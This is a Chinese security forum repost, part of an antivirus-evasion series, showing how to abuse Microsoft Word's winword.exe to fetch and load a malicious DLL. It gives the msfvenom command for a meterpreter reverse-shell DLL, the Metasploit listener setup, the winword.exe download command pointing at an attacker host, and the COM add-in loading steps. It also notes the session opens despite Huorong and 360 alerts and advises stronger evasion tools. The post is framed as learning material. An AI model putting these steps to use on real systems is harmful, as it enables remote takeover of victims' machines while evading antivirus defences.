安全矩阵

 找回密码
 立即注册
搜索
查看: 2303|回复: 0

免杀专题(50)-白名单winword.exe执行payload

[复制链接]

30

主题

60

帖子

447

积分

中级会员

Rank: 3Rank: 3

积分
447
发表于 2020-3-18 19:17:43 | 显示全部楼层 |阅读模式
免杀专题(50)-白名单winword.exe执行payload

转载自微信公众号:Tide安全团队      作者:Zhangyida

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

一、winword简介
winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

二、通过winword.exe执行payload
msfvenom生成木马:
  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll
复制代码
设置监听:
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 192.168.19.146
  4. set lport 23333
  5. exploit
复制代码
winword.exe下载payload:
  1. winword.exe "http://192.168.19.146/shell.dll"
复制代码
在未开启杀毒软件的情况下,winword.exe未对远程文件做校验直接下载到本地,下载的文件位置:
  1. C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
复制代码

在开启杀毒软件的情况下执行该下载命令时会被拦截,下载的dll文件也会被删除:


winword.exe客户端会以只读的形式乱码显示文件内容:

通过winword.exe加载dll文件,步骤如下:
  1. 文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件
复制代码


添加成功后顺利建立会话:

当火绒和360处于开启的情况下,添加木马dll会报警,但会话依旧会建立:




三、总结

  • 使用msfvenom生成的木马在下载时就会被查杀,建议使用免杀效果更好的工具生成木马。
  • winword.exe在加载木马时调用rundll32.exe程序,所以只能使用32位dll。
  • 下载的木马文件即使关闭office程序后也不会被删除。
  • vt免杀结果感人:




四、参考资料
[url=lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/]lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/[/url]












本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:30 , Processed in 0.015841 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表